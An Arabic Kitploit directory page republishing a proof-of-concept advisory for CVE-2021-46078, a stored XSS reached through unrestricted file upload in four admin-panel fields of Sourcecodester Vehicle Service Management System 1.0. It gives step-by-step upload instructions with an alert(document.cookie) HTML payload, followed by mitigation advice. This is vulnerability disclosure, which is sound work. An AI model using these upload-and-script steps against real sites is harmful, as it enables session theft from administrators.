Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-46078 — CVE-2021-46078 - توجد ثغرة رفع ملفات غير مقيدة (Unrestricted File Upload) في نظام إدارة خدمة المركبات من Sourcecodester الإصدار 1.0. يمكن للمهاجم عن بُعد رفع ملفات خبيثة تؤدي إلى ثغرة برمجة نصية عبر المواقع مخزنة (Stored Cross-Site Scripting). | Kitploit
أدوات/GitHubGitHub/sanupl/cve-2021-46078
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubsanupl/cve-2021-46078

CVE-2021-46078

CVE-2021-46078 - توجد ثغرة رفع ملفات غير مقيدة (Unrestricted File Upload) في نظام إدارة خدمة المركبات من Sourcecodester الإصدار 1.0. يمكن للمهاجم عن بُعد رفع ملفات خبيثة تؤدي إلى ثغرة برمجة نصية عبر المواقع مخزنة (Stored Cross-Site Scripting).

عرض المستودع
1منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-46078

عنوان الاستغلال: نظام إدارة خدمة المركبات - تحميل ملفات 'متعدد' يؤدي إلى تخزين سكربتات عبر المواقع

مؤلف الاستغلال: SANU P.L

CVE: CVE-2021-46078

CVSS: 4.8 متوسطة

المراجع:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46078
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46078

الوصف:

توجد ثغرة أمنية في تحميل الملفات دون قيود في نظام إدارة خدمة المركبات من Sourcecodester الإصدار 1.0. يمكن لمهاجم عن بُعد تحميل ملفات خبيثة تؤدي إلى ثغرة تخزين سكربتات عبر المواقع (Stored XSS).

1. نظام إدارة خدمة المركبات - 'حسابي' (/admin/?page=user)

الاستغلال:

  1. سجّل الدخول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  2. انتقل إلى قسم حسابي http://localhost/vehicle_service/admin/?page=user

الحمولة:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. احفظ كود HTML أعلاه، على سبيل المثال: XSS.html
  2. في قسم حسابي، أدخل جميع التفاصيل المطلوبة واستعرض ملف HTML في حقل الصورة الرمزية (Avatar).
  3. انقر على زر التحديث.
  4. افتح الصورة الرمزية في تبويب جديد.
  5. سيتم تشغيل كود جافاسكربت الخبيث.

2. نظام إدارة خدمة المركبات - 'قائمة المستخدمين' (/admin/?page=user/manage_user)

الاستغلال:

  1. سجّل الدخول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  2. انتقل إلى قسم قائمة المستخدمين وانقر على زر إنشاء جديد.

الحمولة:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. احفظ كود HTML أعلاه، على سبيل المثال: XSS.html
  2. في صفحة إنشاء مستخدم جديد، أدخل جميع التفاصيل المطلوبة واستعرض ملف HTML في حقل الصورة الرمزية (Avatar).
  3. انقر على زر الحفظ.
  4. افتح الصورة الرمزية في تبويب جديد.
  5. سيتم تشغيل كود جافاسكربت الخبيث.

3. نظام إدارة خدمة المركبات - 'الإعدادات-شعار النظام' (/admin/?page=system_info)

الاستغلال:

  1. سجّل الدخول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  2. انتقل إلى قسم الإعدادات http://localhost/vehicle_service/admin/?page=system_info

الحمولة:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. احفظ كود HTML أعلاه، على سبيل المثال: XSS.html
  2. في قسم الإعدادات، أدخل جميع التفاصيل المطلوبة واستعرض ملف HTML في حقل شعار النظام.
  3. انقر على زر التحديث.
  4. افتح صورة شعار النظام في تبويب جديد.
  5. سيتم تشغيل كود جافاسكربت الخبيث.

4. نظام إدارة خدمة المركبات - 'الإعدادات-غلاف الموقع' (/admin/?page=system_info)

الاستغلال:

  1. سجّل الدخول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  2. انتقل إلى قسم الإعدادات http://localhost/vehicle_service/admin/?page=system_info

الحمولة:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. احفظ كود HTML أعلاه، على سبيل المثال: XSS.html
  2. في قسم الإعدادات، أدخل جميع التفاصيل المطلوبة واستعرض ملف HTML في حقل غلاف الموقع.
  3. انقر على زر التحديث.
  4. افتح صورة غلاف الموقع في تبويب جديد.
  5. سيتم تشغيل كود جافاسكربت الخبيث.

التأثير:

يمكن للمهاجم تحميل ملف خبيث في عدة نقاط نهاية (endpoints) مما يؤدي إلى تخزين سكربتات عبر المواقع (Stored XSS).

التخفيف:

يُوصى بتنفيذ ما يلي:

  • لا تقبل اسم الملف وامتداده مباشرةً دون وجود مرشح قائمة بيضاء (white-list).
  • إذا لم تكن هناك حاجة إلى أحرف Unicode، يُنصح بشدة بقبول الأحرف الأبجدية الرقمية فقط ونقطة واحدة فقط كمدخل لاسم الملف والامتداد.
  • حدّد حجم الملف إلى قيمة قصوى لمنع هجمات حجب الخدمة (DoS).
  • يجب ألا يملك دليل التحميل أي صلاحية "تنفيذ".
  • لا تعتمد على التحقق من جانب العميل فقط.
تنزيل الأداة